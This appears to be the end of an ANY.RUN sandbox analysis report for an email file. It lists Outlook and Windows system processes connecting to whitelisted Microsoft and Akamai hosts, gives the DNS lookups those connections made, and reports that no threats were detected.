RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5080
OUTLOOK.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
whitelisted
5080
OUTLOOK.EXE
23.48.23.18:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
5080
OUTLOOK.EXE
52.111.229.20:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.174
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
omex.cdn.office.net
  • 23.48.23.18
  • 23.48.23.66
  • 23.48.23.25
  • 23.48.23.62
  • 23.48.23.11
  • 23.48.23.52
  • 23.48.23.6
  • 23.48.23.65
  • 23.48.23.42
whitelisted
messaging.lifecycle.office.com
  • 52.111.229.20
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
login.live.com
  • 40.126.31.0
  • 20.190.159.131
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.73
  • 20.190.159.128
  • 20.190.159.71
  • 20.190.159.0
whitelisted
self.events.data.microsoft.com
  • 20.189.173.16
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
backup-message-10.149.147.133_9045-13362741.eml